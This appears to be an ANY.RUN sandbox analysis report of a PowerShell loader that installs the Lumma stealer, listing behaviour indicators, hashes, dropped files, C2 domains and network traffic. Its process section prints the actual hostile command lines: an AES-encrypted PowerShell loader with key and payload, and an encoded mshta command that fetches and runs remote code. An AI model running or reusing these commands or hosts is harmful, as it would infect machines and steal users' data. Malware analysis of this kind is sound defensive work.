File name:

continuesurf.b-cdn.net.ps1

Full analysis: https://app.any.run/tasks/4b452f9e-cbac-44ee-a741-eb1e6a75edf8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: August 25, 2024, 13:22:11
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
lumma
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

3693D54BC3E0A508EEFA28F951CC8E68

SHA1:

963018C74563181FB8F60BAA032CE8CC018CFD0D

SHA256:

8B24E9E9CEDAA214EF125BC43217E83A0B46EB7BF759A2AD7C735D5D75CA95C8

SSDEEP:

3:VSJJLNyAmarBO/tmt55akuBtzsqXg2JHbPROkJ+NGwlnYn:snyuk854kuBx5XdJ1OkUNGT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6720)

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 6992)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6340)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6992)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Stealers network behavior

      • BitLockerToGo.exe (PID: 6552)

    • LUMMA has been detected (SURICATA)

      • BitLockerToGo.exe (PID: 6552)

    • Actions looks like stealing of personal data

      • BitLockerToGo.exe (PID: 6552)

    • LUMMA has been detected (YARA)

      • BitLockerToGo.exe (PID: 6552)

  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6720)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6720)
      • mshta.exe (PID: 6992)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6720)

    • Application launched itself

      • powershell.exe (PID: 6720)

    • Process drops legitimate windows executable

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)

    • Drops the executable file immediately after the start

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6992)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6992)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6340)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Searches for installed software

      • BitLockerToGo.exe (PID: 6552)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6992)

    • Checks proxy server information

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Checks supported languages

      • 0qbittorrent.exe (PID: 6572)
      • BitLockerToGo.exe (PID: 6552)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6340)

    • Disables trace logs

      • powershell.exe (PID: 6340)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6340)

    • The executable file from the user directory is run by the Powershell process

      • 0qbittorrent.exe (PID: 6572)

    • Reads the computer name

      • BitLockerToGo.exe (PID: 6552)

    • Reads the software policy settings

      • BitLockerToGo.exe (PID: 6552)

    • Reads the machine GUID from the registry

      • BitLockerToGo.exe (PID: 6552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process(6552) BitLockerToGo.exe
C2 (9)condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
greetycruthsuo.shop
locatedblsoqp.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs mshta.exe powershell.exe conhost.exe no specs 0qbittorrent.exe no specs #LUMMA bitlockertogo.exe

Process information

PID
CMD
Path
Indicators
Parent process
6340"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function oantqH($trGRPsJe){return -split ($trGRPsJe -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$dMqhbGM = oantqH('8C5492828561D827E4CA0443CFAF2626047B0126D05C47A0065FC812E91BC941C04BBEE09D95FF9842534E64B3C4CA55A7A3E1ED6B9EC17D0DAA2DFB5FF86FF76142ED26BCBBC8E8E8B9CDEDFF201FCACF04B0C0D33F51719BD2B2C0F660F1438237EF2580B28DD7B80BBC6F3DDC1DAE42E1CF0D1A95EE8402710FDDC612F4082138ABB0B112A7E78F83F8E922B2A5C186D359990DD28681F354671341D29DB8ACE3A0D39C1095D605099202E67C3EBC969A2305BF93EB7AAD2931FA4C7C01ACD5976AD4DB693C8B12D89D40D404226D0E69686E0D9D2739539438326B27C6196378DA3803C73F1EE5B42E9ABE004E8B8642727D4EFDDD6EFDAB12D4A2A9B537C9DB47DB802283569BC0A69BD88EC17601FBAB677B8405EDC3BE53A11B157D6E34DF97BBA022FAAF089F7AF2D849BC0A852B4F5F240F827F279356CCE4033EE5353183E2367AFC6B87C4B8E970C954143E073F13B04474EB026CB9B1EC71F73C19D234033A007F3F9CA086980A9E2F1BFA16FAEE4ADB0EFF1A692E4FE9FAD3A76CBB28D8B2EFAA60958314DA45880035737CDA9C9A20198182D1E4998AC477CDF347A72284493E88BAC9DE66ECC6ECFF3845C9306586A1C565D650375335A59C0D621BC924E61A87DB4BB173B6ABDFC5AE06DEB41609C3B2EBFA35C1C42727F79C8C0915A7893527A0DE2B5E744C13878D6C3FFFC8266437949C476E740CA50FA6133538D12FEC7DA82748489C48982ECF95299A3C1F6D42A207995E781BCFEB5019B60470BDCAA5E6E9009BFE91C1460F9C544CF6C0AD73AB8F8347CEB56C99CA8482153ADDB74B1BC2AD18D69DAF389918C67BA751B6EBDAD3F55CA0359F0F5B933E3FBE60F256351F73DF19AC173687BD809DEDEBEC7AA9FBC54205C84205D090E2884BD7B29F48AED98B06D1658DCD80A2B16E6197765B83AA42B1577926A8213E452CBA731F06F1BB71FB0FE8891449DC812D73A9CF37CECF7946897329C4340FEFE92D2961C00623F2B43BE104C8F21201AD7148B36DAA02DA2ACB9B228D4BC8A036278A74B20D657274CE54CDC04D48D4C69F5BDCD2BFB840ED2E5F63B2F316F50A97F244720F3CCE00065EC18E63DED9C69C7042F6F95985B13CEE4741202B35687C09BBB2156287EDC08E3F388676F372B640812539D12929A2FC6913D629B2AAB2F3C56645858AD3C60C763E479DC128611B4BCDEA74F6AEEADC5BE82D16AD419A0DF2C3B4FD5EBEEB37208A8F5C2F91297CE5F511716516BBE2BD3E390E80CB2421DBBA5690CBF25E189F85FA021C14FA0DDBE08FACA49029C00FEA8C735A226EEF99370D4A80D500831D8A6B526D342EE5F2BB2D5471E9FD8770F63AC6C0ACCBEE032920206203B550E920FE25882AACB692EDF6E865EF48B363BBC0EFEE3A18BFACA2BA5D0839EA27184776B1F4F32F107A9F10ACFF20FD7438E8AE87A0DCC2DFB40F98826920EF571E46CEEB22A92CAAA33DB4FDA234BE4F1B6382FC4C89669D14CE161ADDEE1D3AA6EF9F45554DB6F6F5C4D272E653EC8FBDE560C8C407DD0A28814E4B0AB81457F1');$BITXV = [System.Security.Cryptography.Aes]::Create();$BITXV.Key = oantqH('4847504162676B4452496B5450714854');$BITXV.IV = New-Object byte[] 16;$saEXwRZF = $BITXV.CreateDecryptor();$NTWbdtzUh = $saEXwRZF.TransformFinalBlock($dMqhbGM, 0, $dMqhbGM.Length);$hGlciEwhV = [System.Text.Encoding]::Utf8.GetString($NTWbdtzUh);$saEXwRZF.Dispose();& $hGlciEwhV.Substring(0,3) $hGlciEwhV.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6448\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6552"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
0qbittorrent.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BitLocker To Go Reader
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Lumma
(PID) Process(6552) BitLockerToGo.exe
C2 (9)condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
greetycruthsuo.shop
locatedblsoqp.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
6572"C:\Users\admin\AppData\Local\Temp\0qbittorrent.exe" C:\Users\admin\AppData\Local\Temp\0qbittorrent.exepowershell.exe
User:
admin
Company:
The qBittorrent project
Integrity Level:
MEDIUM
Description:
qBittorrent - A Bittorrent Client
Exit code:
666
Version:
4.6.6
Modules
Images
c:\users\admin\appdata\local\temp\0qbittorrent.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\powrprof.dll
6720"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\continuesurf.b-cdn.net.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6728\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6856"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAHEAdQBlAHMAdABlAGQALQBmAGkAbABlAC4AYgAtAGMAZABuAC4AbgBlAHQALwBmAGwAYQByAGUAIgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6992"C:\WINDOWS\system32\mshta.exe" https://requested-file.b-cdn.net/flareC:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
31 144
Read events
30 865
Write events
279
Delete events
0

Modification events

(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6992) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
8
Suspicious files
5
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6720powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:C8CF02268AC55AB08CA397B680CE4207
SHA256:93C35E86DC9E882777B010715386FE13D448D42A03AF597EB6A38F3E93977E10
6856powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bihlixl2.nxs.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6856powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:67C8EBE2C761AAEE0D12BB548D684798
SHA256:B185DD58E43A9FD66670A67891F8EF261A337872972B088C586E26F0E690C01F
6340powershell.exeC:\Users\admin\AppData\Local\Temp\flare.zipcompressed
MD5:7BB3A528B30078266A15AD218016B39D
SHA256:74B7279CFBD8B3B4079E16E3E915F82689623A519C3F959CE2D592D1A47CA933
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s53hr1hq.ojs.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6992mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\flare[1]executable
MD5:09F4501EE00227510BC199B337B40A8D
SHA256:57635927148887F6229AE8B140BB74B172394994D80696991903DCD4496FD04C
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_atrxkfoh.sce.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340powershell.exeC:\Users\admin\AppData\Local\Temp\wvrcimprov.dllexecutable
MD5:3FA3F6F84B1ACB7CFBE329CFEAD0687A
SHA256:EF464FA7D015CD47C1AE7115676B7B3B8327AB6DB3C35562E2CEE79EA116372E
6720powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hihkloht.343.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6720powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGNDK9KRWM1PTEUN1HDI.tempbinary
MD5:C8CF02268AC55AB08CA397B680CE4207
SHA256:93C35E86DC9E882777B010715386FE13D448D42A03AF597EB6A38F3E93977E10
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
22
DNS requests
4
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
169.150.247.35:443
https://requested-file.b-cdn.net/flare
unknown
executable
161 Kb
POST
200
104.21.28.66:443
https://greetycruthsuo.shop/api
unknown
text
2 b
GET
200
169.150.247.35:443
https://requested-file.b-cdn.net/flare.zip
unknown
compressed
9.30 Mb
POST
200
104.21.28.66:443
https://greetycruthsuo.shop/api
unknown
text
15 b
POST
200
172.67.144.151:443
https://greetycruthsuo.shop/api
unknown
text
15.1 Kb
POST
200
172.67.144.151:443
https://greetycruthsuo.shop/api
unknown
text
15 b
POST
200
104.21.28.66:443
https://greetycruthsuo.shop/api
unknown
text
15 b
POST
200
104.21.28.66:443
https://greetycruthsuo.shop/api
unknown
text
15 b
POST
200
172.67.144.151:443
https://greetycruthsuo.shop/api
unknown
text
48 b
POST
200
172.67.144.151:443
https://greetycruthsuo.shop/api
unknown
text
15 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:138
whitelisted
1292
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3308
RUXIMICS.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1292
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
6992
mshta.exe
169.150.247.35:443
requested-file.b-cdn.net
GB
unknown
4324
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6340
powershell.exe
169.150.247.35:443
requested-file.b-cdn.net
GB
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.238
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
requested-file.b-cdn.net
  • 169.150.247.35
whitelisted
greetycruthsuo.shop
  • 172.67.144.151
  • 104.21.28.66
malicious

Threats

PID
Process
Class
Message
6552
BitLockerToGo.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
continuesurf.b-cdn.net.ps1